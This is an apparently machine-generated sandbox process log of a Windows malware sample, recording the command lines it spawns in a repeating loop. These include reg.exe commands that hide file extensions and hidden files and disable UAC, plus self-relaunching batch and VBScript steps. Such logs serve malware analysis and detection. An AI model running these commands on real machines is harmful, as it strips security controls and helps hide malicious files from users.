C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cCAgIYwU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1426107088864322520-255081647-94785146918805344171271362695-980105618-1107187368"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\IUUQowkg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KoAEEkUY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "12446986863839385-3942799-12026598087946042901658254267-1761493411173105642"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\paoEQMsU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "269869885-9812314091114697695565818423-16944278001649652427506178408-822787897"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1696071902-709837720872262950716770532-3226660972009823601-1663249727-1573704184"

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\rmUgUsMM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Pwoscook.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-11960796851092270340-1749045846-920097807-6731434221095135844-1077441289-1006952972"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1524848191154849030-1932816146-1914663191-2095671234349439722139034310-935404897"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\uYkocAkM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AuQkUQIg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-194418085848526560877740705-8667673-581739682-1287424169-1357383102-1363066888"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tYsYAkww.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-144052521-186001243786594904-1762721545-1212872668-12030301691285726988-1204668539"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PwoIoccw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1141522045-1624710450-88646891917443169911203256133255627685-1043325550-1623658915"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2067852541-8275723351717606121644136246-1566037557-34404950-344023644-834880824"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1055162969-21093698881819767096-20829634787546510314635965062341364741676004098"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XqUoIMQY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UwwsEAYM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "36003577-822232477798561986-1763104491-714788973-1297655852693502264257153998"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OwQwcIgY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1376705544-211637970233174387-663430307728543586856986747-10315294671051966996"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1383289705-80537007810188069901721936059252735355971553891795361171-1492897337"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1319542776-374779536-201854105-19520884461806047129213032446435941551-1834574271"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ewIsUwwo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1379173920262228559810166139-857556405-1385913541-652851520-6005214691408321615"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-77634842141397794211763024491008597777339116553-1954706124-135455050-1921296695"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "521462220596274073-931815496877606179719643981-1032387596176173758197692285"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BGYMAIIs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vaUwIAgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VOQwggcY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jqkscQAc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-7597006431639225702-1673462234-3057914372044557163-1590921161318021825399423330"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VKIcYkcI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "48661695-570454498942293989125187048144331221176614338-1004273857601013157"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "127850386419561030901712551225-834804077427833168772012491192627450676653587"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ySYEAEow.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

